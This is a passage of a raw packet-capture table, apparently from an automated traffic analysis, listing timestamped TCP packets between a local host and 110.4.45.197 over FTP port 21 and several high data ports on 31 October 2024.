                                                  Oct 31, 2024 17:06:18.082647085 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.082650900 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.082653999 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.082669020 CET6371149938192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.082715034 CET6371149938192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.087246895 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087265015 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087306023 CET6371149938192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.087390900 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087395906 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087399006 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087424994 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087450981 CET6371149938192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.087472916 CET6371149938192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.087515116 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087544918 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087610960 CET6371149938192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.087635994 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087640047 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087666988 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.087872028 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.088232040 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.093213081 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.093861103 CET4993863711110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.093904018 CET6371149938192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.179188013 CET6370921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.339585066 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.340130091 CET6371249662192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.345190048 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.345273972 CET6371249662192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.345312119 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:18.350241899 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:18.859827042 CET2163709110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.006967068 CET6370921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:19.285250902 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.285928965 CET6371249662192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:19.290940046 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.290957928 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.290963888 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.291003942 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.291065931 CET6371249662192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:19.291074991 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.291081905 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.291090012 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.291142941 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.291148901 CET6371249662192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:19.291150093 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.291182995 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.291296959 CET6371249662192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:19.295943022 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.295969963 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.296013117 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.296046019 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.296082020 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.296087980 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.296093941 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.296132088 CET6371249662192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:19.296190023 CET6371249662192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:19.296477079 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.296574116 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.296600103 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.296680927 CET6371249662192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:19.296757936 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.296763897 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.302932024 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.305125952 CET4966263712110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:19.305284977 CET6371249662192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:19.353780031 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:20.088002920 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:20.164963007 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:26.736078978 CET6370921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:26.741019011 CET2163709110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:27.080883026 CET2163709110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:27.081568003 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:27.087169886 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:27.089860916 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:27.089862108 CET6370921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:27.094945908 CET2163709110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:27.996221066 CET2163709110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:27.997991085 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.002995014 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.003043890 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.003047943 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.003070116 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.003108978 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.003154039 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.003186941 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.003190994 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.003217936 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.003221035 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.003287077 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.003307104 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.003612995 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.003750086 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.008024931 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.008074045 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.008078098 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.008089066 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.008094072 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.008097887 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.008105040 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.008167028 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.008184910 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.008196115 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.008264065 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.008454084 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.008488894 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.008666039 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.008960962 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.013056040 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.013159037 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.013164997 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.013168097 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.013202906 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.013278961 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.013550997 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.014053106 CET5011363713110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.014229059 CET6371350113192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.098664045 CET6370921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:28.778490067 CET2163709110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:28.822398901 CET6370921192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:40.485181093 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:40.490147114 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:40.828809023 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:40.829312086 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:40.834201097 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:40.834263086 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:40.834332943 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:40.839220047 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.783317089 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.783586979 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.788728952 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.788840055 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.788876057 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.788877964 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.788966894 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.788970947 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.788973093 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.789002895 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.789028883 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.789135933 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.789139986 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.789156914 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.789165974 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.789222956 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.789222956 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.789397955 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.793919086 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.793993950 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794008017 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794034958 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794159889 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794163942 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794209957 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.794261932 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794334888 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.794349909 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.794493914 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794497967 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794507980 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794559956 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794564009 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.794658899 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.799464941 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.799607038 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.799638987 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.799819946 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.800383091 CET5624663714110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:41.800976992 CET6371456246192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:41.866432905 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:42.596257925 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:42.663290024 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:46.828071117 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:46.832971096 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:47.171870947 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:47.174325943 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:47.179197073 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:47.181862116 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:47.182044029 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:47.187273979 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.181260109 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.181453943 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.190447092 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.190505028 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.190545082 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.190556049 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.190579891 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.190599918 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.190620899 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.190716982 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.190757990 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.190774918 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.190784931 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.190795898 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.190815926 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.190849066 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.190903902 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.190922022 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.190967083 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.195583105 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.195591927 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.195666075 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.195673943 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.195688963 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.195708990 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.195723057 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.195740938 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.195775032 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.207775116 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.207823992 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.212826967 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.212836981 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.213098049 CET6287263715110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.213162899 CET6371562872192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.350817919 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.354692936 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:48.354737997 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:48.947211027 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:49.053946972 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:50.578996897 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:50.584033012 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:50.923458099 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:50.923835993 CET6371654434192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:50.928910017 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:50.929088116 CET6371654434192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:50.929219961 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:50.934441090 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.842674971 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.844037056 CET6371654434192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:51.849030018 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.849035978 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.849067926 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.849078894 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.849148035 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.849153042 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.849158049 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.849199057 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.849212885 CET6371654434192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:51.849240065 CET6371654434192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:51.849241972 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.849247932 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.849379063 CET6371654434192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:51.854147911 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.854227066 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.854245901 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.854249954 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.854281902 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.854285955 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.854345083 CET6371654434192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:51.854373932 CET6371654434192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:51.854660988 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.854871988 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.854995966 CET6371654434192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:51.859555006 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.859673023 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.859925985 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.860054970 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.860726118 CET5443463716110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:51.860953093 CET6371654434192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:52.056823015 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:52.636862993 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:52.850837946 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:58.592609882 CET6371721192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:58.837789059 CET2163717110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:58.837853909 CET6371721192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:58.838136911 CET6371721192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:06:58.844438076 CET2163717110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:06:58.844485044 CET6371721192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:10.308928967 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:10.314069033 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:10.323750973 CET6371821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:10.328783989 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:10.328857899 CET6371821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:10.654289961 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:10.654613972 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:10.659612894 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:10.659687996 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:10.659734964 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:10.664621115 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.259382010 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.259516954 CET6371821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.264427900 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.581873894 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.584038019 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.589056015 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.589062929 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.589067936 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.589080095 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.589090109 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.589126110 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.589149952 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.589154959 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.589188099 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.589209080 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.589330912 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.589339018 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.589361906 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.589560032 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.594043970 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594098091 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594104052 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594125986 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594131947 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594139099 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594144106 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594165087 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.594197989 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594206095 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.594230890 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594237089 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594290972 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.594366074 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.594506979 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.599159002 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.599245071 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.599261045 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.599339962 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.599385023 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.599390984 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.599405050 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.600326061 CET6177663719110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.600579977 CET6371961776192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.605000019 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.607976913 CET6371821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.612986088 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.633865118 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.969383001 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:11.969516039 CET6371821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:11.974329948 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:12.318413019 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:12.318557024 CET6371821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:12.323689938 CET2163718110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:12.364481926 CET2163698110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:07:12.413419008 CET6369821192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:07:12.664740086 CET2163718110.4.45.197192.168.2.4
